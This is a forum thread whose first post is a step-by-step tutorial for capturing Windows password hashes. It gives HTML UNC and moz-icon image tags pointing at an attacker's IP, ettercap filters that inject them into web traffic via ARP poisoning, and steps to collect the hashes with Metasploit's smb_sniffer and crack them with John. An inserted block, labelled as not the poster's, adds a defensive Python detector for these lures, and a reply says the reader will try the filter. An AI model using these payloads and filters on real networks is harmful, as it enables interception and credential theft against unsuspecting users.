
Thread: Capture Password Hashes from Patched Windows Machines

  1. #1
    Join Date: Dec 2007, Posts: 12

    Capture Password Hashes from Patched Windows Machines

    Prerequisites:
    the victim is browsing the web from Windows using Mozilla (and family) version <2.0.0.6, or I.E. (any version, to my knowledge)

    How it works:
    send the victim malicious HTML containing a NetBIOS share location
    the victim's computer will attempt to log in to the attacker's machine, which is running a fake Samba server, set up only to capture the login information from the victim

    the HTML code would be (I.E.):
    <img src="\\192.168.1.100\share\picture.png">
    or (Mozilla):
    <img src="moz-icon:file:///%5c/192.168.1.100/share/picture.png">

    NOTE: it doesn't have to be a real file that's being hosted

    ettercap filters replacing the Google image with that code work nicely
    # googlbios.ie.filter
    # replaces http strings transparently, compile with etterfilter
    if (ip.proto == TCP && tcp.src == 80) {
    replace("/intl/en_ALL/images/logo.gif", "\\192.168.1.100\share\picture.png");
    msg("Replaced\n");
    }
    or
    # googlbios.moz.filter
    # replaces http strings transparently, compile with etterfilter
    if (ip.proto == TCP && tcp.src == 80) {
    replace("/intl/en_ALL/images/logo.gif", "moz-icon:file:///%5c/192.168.1.100/share/picture.png");
    msg("Replaced\n");
    }
    respectively

    compile like so
    etterfilter googlbios.*.filter -o googlbios.ef

    (I use ettercap filters a lot for remote code testing; really handy without causing much out of the ordinary in web browsing. Instead of the Google image you could use some small image on a popular web page)

    run ettercap: unified sniffing, scan for hosts, ARP poisoning, etc.

    NOTE: after you're done manipulating the packets on the network, be sure to STOP ARP poisoning and STOP sniffing, otherwise you'll DoS the LAN

    NOTE1: netsed is a "cleaner" alternative to ettercap in this case; you have to look up HTML escape codes for / and .

    on the attacker's computer they would be running smb_sniffer from Metasploit, which'll send you the password hash

    crack with John, and ta-da

    works on all versions of Windows (patched and otherwise); I haven't personally tested it on Vista, but I'm told it works the same

    Prevention: run a firewall blocking 137-139 and 445.
    NetBIOS is the biggest security hole in Windows. Disabling its functionality is generally a smart move.

    Jake

    More nifty tuts for patched machines coming soon....
    maybe I'll stop being such a lazy ass and make a video...

    where I got the idea:
    hxxp://packetstorm.offensive-security.com/papers/attack/tactical_paper.pdf
    hxxp://irongeek.com/i.php?page=security/ettercapfilter
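    On the defensive side, here is an added example (not the poster's code) of the check a web proxy or IDS test harness could run on an HTML body to flag the two injected image sources this post describes: a bare UNC path and a moz-icon file URL with a percent-encoded backslash, both of which make a Windows client open an outbound SMB connection when the page renders. The sample HTML is constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# The two outbound-SMB triggers from the thread:
#  1. a bare UNC path            \\host\share\file
#  2. moz-icon:file:///%5c/host/...  (%5c is a percent-encoded backslash)
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")
MOZ_ICON_RE = re.compile(r"^moz-icon:file:(?:///)?[\\/]+([^\\/]+)[\\/]", re.IGNORECASE)


def classify(url):
    """Return the host an SMB lure points at, or None if the URL is harmless."""
    decoded = unquote(url.strip())          # turns %5c back into a backslash
    m = UNC_RE.match(decoded) or MOZ_ICON_RE.match(decoded)
    return m.group(1) if m else None


class SmbLureFinder(HTMLParser):
    """Collects (tag, host, raw value) for every src/href/background
    attribute that would trigger an SMB connection to an external host."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href", "background") and value:
                host = classify(value)
                if host:
                    self.hits.append((tag, host, value))


def find_smb_lures(html):
    parser = SmbLureFinder()
    parser.feed(html)
    return parser.hits


# Constructed sample: the original Google logo plus the two injected variants.
SAMPLE_HTML = (
    '<html><img src="/intl/en_ALL/images/logo.gif">'
    '<img src="\\\\192.168.1.100\\share\\picture.png">'
    '<img src="moz-icon:file:///%5c/192.168.1.100/share/picture.png"></html>'
)

if __name__ == "__main__":
    for tag, host, raw in find_smb_lures(SAMPLE_HTML):
        print(f"SMB lure in <{tag}> -> host {host}: {raw}")
```

    Hosts reported by find_smb_lures are exactly the ones that should already be unreachable on 137-139 and 445 from workstations under the firewall rule above.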

  2. #2 duwey96
    Join Date: Nov 2007, Posts: 41

    Interesting filter idea, I think I'll give it a try tomorrow, just to test and play around.
